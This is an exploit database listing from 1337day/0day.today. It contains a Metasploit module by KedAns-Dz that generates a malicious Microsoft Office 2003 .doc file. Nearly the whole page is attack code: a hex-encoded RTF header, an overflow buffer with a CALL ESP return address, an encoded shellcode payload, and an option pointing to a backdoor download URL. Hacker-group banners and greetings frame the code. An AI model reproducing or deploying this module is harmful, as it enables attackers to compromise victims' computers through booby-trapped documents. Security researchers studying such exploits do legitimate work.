Lucene search
KedAns-Dz1337DAY-ID-17438HistoryJan 25, 2012 - 12:00 a.m.
Microsoft Office 2003 (.doc) Command Exec and local BOF (msf)
2012-01-2500:00:00
KedAns-Dz
0day.today
17
Exploit for windows platform in category local exploits
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
###
# Title : Microsoft Office 2003 (.doc) Command Exec and local BOF (msf)
# Author : KedAns-Dz
# E-mail : [email protected] ([email protected]) | [email protected] | [email protected]
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com
# Facebook : http://facebook.com/KedAns
# platform : windows ( local BOF via MSF)
# Type : local exploit / Buffer Overflow / Metasploit
###
##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. |
# | ------------------------------------------------- < |
###
##
# $Id: ms09_067_word_exec.rb | 01:59 25/01/2012| KedAns-Dz $
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Office 2003 (.doc) Command Exec and local BOF',
'Description' => %q{
This module exploits a buffer overflow in Microsoft Office 2003
and Command Exec With .doc file .
},
'License' => MSF_LICENSE,
'Author' =>
[
'b33f',
'g11tch',
'KedAns-Dz <ked-h[at]hotmail.com>' # MSF module
],
'Version' => '1.0',
'References' =>
[
[ 'URL', 'http://exploit-db/exploits/18334' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "'",
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'EncoderOptions' =>
{
'BufferRegister' => 'ESI',
}
},
'Platform' => 'win',
'Targets' =>
[
[ 'Microsoft Office 2003 - MSWord (.doc Heap Spray)', { 'Ret' => '' } ],
],
'DisclosureDate' => 'JAN 08 2012',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),
OptString.new('URLBD', [ true, 'URL From the Backdoor.', 'http://']),
], self.class)
end
def exploit
# Encode the url.
url = Rex::Text.to_unescape(datastore['URLBD'])
# Header File
file =
"\x7b\x5c\x72\x74\x23\x23\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70"+
"\x7d\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70\x7d\x7d\x7b\x5c\x73"+
"\x68\x70\x7b\x5c\x73\x70\x7d\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x2a"+
"\x5c\x73\x68\x70\x69\x6e\x73\x74\x5c\x73\x68\x70\x66\x68\x64\x72"+
"\x30\x5c\x73\x68\x70\x62\x78\x63\x6f\x6c\x75\x6d\x6e\x5c\x73\x68"+
"\x70\x62\x79\x70\x61\x72\x61\x5c\x73\x68\x20\x70\x77\x72\x32\x7d"+
"\x7b\x5c\x73\x70\x7b\x5c\x73\x6e\x20\x7b\x7d\x7b\x7d\x7b\x5c\x73"+
"\x6e\x7d\x7b\x5c\x73\x6e\x7d\x7b\x5c\x2a\x5c\x2a\x7d\x70\x46\x72"+
"\x61\x67\x6d\x65\x6e\x74\x73\x7d\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+
"\x7b\x5c\x73\x76\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+
"\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x52"+
"\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+
"\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x7d\x39\x3b\x32\x3b\x66\x66"+
"\x66\x66\x66\x66\x66\x66\x66\x66"
# Buffer Overflow
buf = "\x23" * 501
buf << "\x30\x35"
buf << "\x30" * 40
buf << "\x36\x36\x34\x33\x33\x32\x33\x30" # CALL ESP - WINWORD.exe
buf << "\x30\x30\x30\x30\x38\x30\x37\x63" * 2
buf << rand_text_alpha(42)
buf << "\x39\x30" * 18
buf << payload.encoded
# Create the doc
doc = file
doc << buf
doc << url
doc << "\x00"
doc << "{}}}}}}"
doc << "\x0d\x0a"
doc << "}"
print_status("Creating '#{datastore['FILENAME']}' file...")
file_create(doc)
end
end
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * Kalashinkov3 * SeeMe * ZoRLu * anT!-Tr0J4n
# Anjel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#=================================================================================================
# 0day.today [2018-03-09] #